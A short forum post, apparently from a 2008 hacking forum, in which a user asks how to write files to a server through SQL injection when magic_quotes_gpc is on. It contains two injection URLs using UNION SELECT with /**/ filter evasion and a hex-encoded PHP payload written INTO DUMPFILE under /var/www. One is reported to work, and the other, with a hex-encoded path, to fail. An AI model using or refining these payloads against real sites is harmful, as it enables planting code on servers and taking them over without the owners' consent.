
31.03.2008, 20:30
|
|
Новичок
Регистрация: 04.01.2008
Сообщений: 6
С нами:
9659174
Репутация:
21
|
|
Hi,
Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on?
I tried to hex-encode the path, but no file is created then.
e.g:
www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/'/var/www'/*
Works!
But
www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/0x2f7661722f777777/*
doesn work!
Is there a possibility to dump files, if magic_quotes_gpc ist switched on?
Thank you.
|
|
|